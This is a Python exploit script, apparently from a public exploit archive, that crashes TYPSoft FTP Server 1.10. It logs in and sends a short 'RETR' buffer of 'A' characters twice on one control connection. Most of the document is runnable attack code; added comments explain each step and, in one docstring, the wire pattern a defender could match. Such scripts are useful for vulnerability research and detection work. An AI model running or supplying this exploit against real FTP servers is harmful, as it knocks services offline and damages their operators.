TYPSoft version 1.0 RETR command denial of service exploit.
9e743870310a319983612a510077f27e93555ce348bf5017ef067515f6ee954b
# Exploit Title: TYPSoft FTP Server 1.10 RETR Command DoS
# Date: 5/13/2010
# Author: Jeremiah Talamantes (RedTeam Security)
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows XP, SP2 (EN)
# DESCRIPTION:
# This script exploits a weakness in the RETR command in TYPSoft v1.10.
# It needs only a small buffer, sent repeatedly in succession within
# the same socket connection.
#!/usr/bin/python
# Startup banner: seven lines of author/tool identification written to stdout
# every time the script runs, before any argument checking.
print("\n".join((
    "\n#################################################################",
    "## RedTeam Security ##",
    "## TYPSoft FTP Server v1.10 RETR Command DoS ##",
    "## ##",
    "## Jeremiah Talamantes ##",
    "## labs@redteamsecure.com ##",
    "################################################################# \n",
)))
import socket
import sys
# Define the exploit's usage
def Usage():
    """Print the command-line synopsis followed by the author credit lines."""
    # Each entry is printed on its own line; the embedded "\n" characters
    # produce the blank lines seen in the output.
    for text in (
        "Usage: scriptname.py <IP address> <username> <password>\n",
        "\n\nCredit: Jeremiah Talamantes",
        "RedTeam Security : www.redteamsecure.com/labs\n",
    ):
        print(text)
# Buffer settings
# Argument that start() places after the RETR verb: 30 "A" characters.
# The author notes that a relatively small buffer is sufficient.
# NOTE: the name shadows the Python 2 builtin `buffer`; it is kept because
# start() reads it as a module-level global.
buffer = 30 * "A"
def start(hostname, username, password):
    """Run the USER/PASS/RETR sequence twice over one FTP control connection.

    Connects to TCP port 21 on ``hostname``, prints the server greeting, then
    sends USER, PASS and ``RETR <buffer>`` two times on the same socket
    before closing it.

    Args:
        hostname: Address of the FTP server to connect to.
        username: Account name sent with USER.
        password: Password sent with PASS.

    Exits the process with status 1 if the TCP connection cannot be opened.

    For defenders: on the wire this is a re-login (USER/PASS) immediately
    after a RETR on an already-open control connection, followed by a second
    identical RETR. That ordering is what server logs or a network sensor
    can match on. The page names no fixed release; confirm vendor status
    before relying on an upgrade as the mitigation.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        conn.connect((hostname, 21))
    except:
        # NOTE: bare except kept from the original; it also traps
        # KeyboardInterrupt and SystemExit, not only socket errors.
        print("Error: unable to connect to host")
        sys.exit(1)

    # Server greeting: the only reply that is shown to the user.
    greeting = conn.recv(1024)
    print("[+] " + greeting)

    def login():
        # Replies are read and thrown away; nothing checks whether the
        # server actually accepted the credentials.
        conn.send("USER %s\r\n" % username)
        conn.recv(1024)
        conn.send("PASS %s\r\n" % password)
        conn.recv(1024)

    retr_line = "RETR %s\r\n" % buffer

    # First pass.
    login()
    print("Sending the malicious chars...")
    conn.send(retr_line)

    # Second pass: the reply to the RETR above is never read before the
    # next USER goes out on the same connection.
    login()
    conn.send(retr_line)

    # The socket is closed only on this path; an exception raised by
    # send/recv above would leave it to the interpreter to clean up.
    conn.close()
# Entry point: exactly three positional arguments are required
# (<IP address> <username> <password>); anything else prints the usage
# text and exits with status 1.
if len(sys.argv) == 4:
    # Kept as module-level names, as in the original script.
    hostname, username, password = sys.argv[1:4]
    start(hostname, username, password)
    sys.exit(0)
else:
    Usage()
    sys.exit(1)
# end